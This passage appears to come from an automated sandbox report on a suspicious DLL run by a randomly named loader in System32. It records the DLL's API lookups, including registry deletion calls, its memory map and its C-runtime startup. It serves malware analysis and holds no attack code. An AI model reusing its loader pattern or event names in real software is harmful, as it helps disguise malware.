(hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.487] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.487] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.488] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.488] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.488] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.488] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.488] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.488] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.488] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.488] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.488] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.489] HeapDestroy (hHeap=0x1320000) returned 1 Process: id = "46" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb00" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"127.0.0.1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2052 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2053 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2054 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2055 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2056 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2057 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2058 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2059 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2060 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2061 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2062 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2063 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2064 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2065 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 2066 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2067 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2068 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2069 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2070 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2071 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2072 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2073 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2074 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2075 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2076 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2077 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2078 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 2079 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2080 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2081 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2082 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2083 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2084 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2085 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2086 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2087 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2088 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2089 start_va = 0x1200000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2090 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2091 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2092 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Thread: id = 98 os_tid = 0xca8 [0034.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef80c | out: lpSystemTimeAsFileTime=0x1ef80c*(dwLowDateTime=0xe2444b50, dwHighDateTime=0x1d3dfba)) [0034.528] GetCurrentProcessId () returned 0xca4 [0034.528] GetCurrentThreadId () returned 0xca8 [0034.528] GetTickCount () returned 0x17c31 [0034.528] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef804 | out: lpPerformanceCount=0x1ef804*=371162008) returned 1 [0034.528] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.528] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.528] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.529] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.529] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.529] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.529] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.529] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.529] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.529] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.530] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.530] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.530] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.530] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.531] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.531] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.531] GetCurrentThreadId () returned 0xca8 [0034.531] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"127.0.0.1\"" [0034.531] GetEnvironmentStringsW () returned 0x2e7908* [0034.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13d09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.531] FreeEnvironmentStringsW (penv=0x2e7908) returned 1 [0034.531] GetStartupInfoA (in: lpStartupInfo=0x1ef75c | out: lpStartupInfo=0x1ef75c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.531] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.531] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.531] SetHandleCount (uNumber=0x20) returned 0x20 [0034.531] GetLastError () returned 0x0 [0034.532] SetLastError (dwErrCode=0x0) [0034.532] GetLastError () returned 0x0 [0034.532] SetLastError (dwErrCode=0x0) [0034.532] GetLastError () returned 0x0 [0034.532] SetLastError (dwErrCode=0x0) [0034.532] GetACP () returned 0x4e4 [0034.532] GetLastError () returned 0x0 [0034.532] SetLastError (dwErrCode=0x0) [0034.532] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.532] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef73c | out: lpCPInfo=0x1ef73c) returned 1 [0034.532] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef208 | out: lpCPInfo=0x1ef208) returned 1 [0034.532] GetLastError () returned 0x0 [0034.532] SetLastError (dwErrCode=0x0) [0034.532] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1ef198 | out: lpCharType=0x1ef198) returned 1 [0034.532] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef61c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.532] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef61c, cbMultiByte=256, lpWideCharStr=0x1eef88, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0034.532] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x1ef21c | out: lpCharType=0x1ef21c) returned 1 [0034.532] GetLastError () returned 0x0 [0034.532] SetLastError (dwErrCode=0x0) [0034.532] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.532] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef61c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.532] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef61c, cbMultiByte=256, lpWideCharStr=0x1eef58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.532] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.532] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eed48, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1ef51c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿï<\x82ôT÷\x1e", lpUsedDefaultChar=0x0) returned 256 [0034.532] GetLastError () returned 0x0 [0034.532] SetLastError (dwErrCode=0x0) [0034.532] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef61c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.532] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef61c, cbMultiByte=256, lpWideCharStr=0x1eef78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.532] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.533] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eed68, cchDest=256 | out: lpDestStr=" 